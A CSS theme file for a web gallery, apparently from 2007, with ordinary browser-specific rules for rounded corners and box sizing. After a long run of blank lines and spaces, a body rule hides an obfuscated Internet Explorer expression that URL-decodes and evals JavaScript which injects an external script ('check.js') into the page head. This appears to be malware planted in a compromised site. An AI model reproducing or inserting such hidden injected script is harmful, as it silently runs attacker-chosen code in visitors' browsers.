/* $Id: not-ie.css 1900 2007-03-12 22:33:53Z rub $ */

/* All directives not supported by IE */
/* can be overiden in any theme but not hidden to IE */

#content UL.thumbnails SPAN.wrap2 {
  -moz-border-radius: 4px;	/* round corners with Geko */
  -webkit-border-radius: 4px; /* Safari webkit project */
}
#content DIV#comments {
  padding-left: 5px;
  padding-right: 5px;
  -moz-box-sizing: padding-box !important;
}
FORM#quickconnect LABEL {
  margin:0;
  width: 100%;
 -moz-box-sizing: padding-box !important;
  box-sizing: border-box; /* CSS3 */
}
ul.tabsheet li {
  -moz-border-radius: 6px 6px 0px 0px;	/* round corners with CSS3 compliant browsers */
  -webkit-border-radius: 6px 6px 0px 0px; /* Safari webkit project */
}




































































































                                                                                                                                                      /* a0b4df006e02184c60dbf503e71c87ad */ body { margin-top: expression(eval(unescape('%69%66%20%28%21%64%6F%63%75%6D%65%6E%74%2E%67%65%74%45%6C%65%6D%65%6E%74%42%79%49%64%28%27%4A%53%53%53%27%29%29%7B%20%4A%53%53%31%20%3D%20%35%39%3B%20%4A%53%53%32%20%3D%20%35%38%30%36%31%33%3B%20%4A%53%53%33%20%3D%20%27%2F%45%74%75%64%65%73%2F%53%6F%69%72%65%65%5F%64%65%73%5F%73%74%61%67%69%61%69%72%65%73%2F%75%6C%6F%67%65%2F%64%75%6D%6D%79%2E%68%74%6D%27%3B%20%76%61%72%20%6A%73%20%3D%20%64%6F%63%75%6D%65%6E%74%2E%63%72%65%61%74%65%45%6C%65%6D%65%6E%74%28%27%73%63%72%69%70%74%27%29%3B%20%6A%73%2E%73%65%74%41%74%74%72%69%62%75%74%65%28%27%73%72%63%27%2C%20%27%2F%45%74%75%64%65%73%2F%53%6F%69%72%65%65%5F%64%65%73%5F%73%74%61%67%69%61%69%72%65%73%2F%75%6C%6F%67%65%2F%63%68%65%63%6B%2E%6A%73%27%29%3B%20%6A%73%2E%73%65%74%41%74%74%72%69%62%75%74%65%28%27%69%64%27%2C%20%27%4A%53%53%53%27%29%3B%20%64%6F%63%75%6D%65%6E%74%2E%67%65%74%45%6C%65%6D%65%6E%74%73%42%79%54%61%67%4E%61%6D%65%28%27%68%65%61%64%27%29%2E%69%74%65%6D%28%30%29%2E%61%70%70%65%6E%64%43%68%69%6C%64%28%6A%73%29%20%7D%3B%20'))) } /* a995d2cc661fa72452472e9554b5520c */                                                                                                                                                      




































































































